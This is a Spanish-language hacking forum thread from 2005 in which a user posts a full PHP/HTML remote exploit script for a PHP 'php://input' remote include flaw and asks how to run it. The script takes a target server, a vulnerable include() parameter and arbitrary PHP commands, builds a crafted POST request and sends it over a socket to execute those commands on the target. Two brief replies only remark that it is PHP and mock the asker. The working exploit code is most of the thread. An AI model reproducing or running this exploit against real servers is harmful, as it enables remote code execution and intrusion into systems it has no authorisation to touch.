elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 13:37  


Tema destacado: Únete al Grupo Steam elhacker.NET

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  ¿ Que tipo de exploit es y como se ejecuta?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿ Que tipo de exploit es y como se ejecuta?  (Leído 1,064 veces)
rosub0

Desconectado Desconectado

Mensajes: 7



Ver Perfil WWW
¿ Que tipo de exploit es y como se ejecuta?
« en: 13 Febrero 2005, 09:55 »

El siguiente me dijeron que es un "script exploit" remoto...para la vulnerabilidad : PHP Input Ouput Wrapper Remote Include Function Command Execution Weaknesspero....como se compila y ejecuta este tipo de exploits?..en que esta programado?...Gracias.

<form action="" methode="post" >
target server : <input type="text" name="server" ><br><br>
target file (including URI parameter used in include() call ex:"index.php?includeParam=") : <input type="text" name="file" ><br><br>
exec (enclose php commands between <? .. ?> tags): <input type="text" name="cmd" ><br><br>
<INPUT type="submit" value="send">
</form>

<?
if($cmd){
$message  = "POST /".$file."php://input HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: fr\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen( $cmd )."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cache-Control: no-cache\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
while(!feof($fd)) {
echo fgets($fd,1280);
}
fclose($fd);
}
?>
En línea

Se preguntan si hay vida en otros planetas....a mi me sorprende que todavía haya vida en este.
No a la Guerra, la paz solo puedo lograrse a traves del entendimiento...
Crack_X
Anti-War
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.320


Peace & Love


Ver Perfil WWW
Re: ¿ Que tipo de exploit es y como se ejecuta?
« Respuesta #1 en: 13 Febrero 2005, 12:45 »

Esta hecho en php , si te vieses fijado trae html con el. Si no sabes ni un poco de html te sugiero ni usar eso.
En línea

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
xavierote

Desconectado Desconectado

Mensajes: 134


Ver Perfil
Re: ¿ Que tipo de exploit es y como se ejecuta?
« Respuesta #2 en: 13 Febrero 2005, 13:51 »

Por favor, al menos te podrias, antes de intentar "hackear" algo, ponerte al dia con un mínimo de programación.
Que menos mal que simplemente es código html y php, señalado por los tags <? y ?>.
Hay páginas muy buenas con muchísimos tutoriales, asi que a utilizar el google!  ;D

Lo mejor de todo, es que en el mismo código te habla de los tags que señalan la zona escrita en php:

Código:
exec (enclose php commands between <? .. ?> tags):

Que hasta utilizándolo en un html, te saldría esta frase.

Saludos.
« Última modificación: 13 Febrero 2005, 14:03 por xavierote » En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines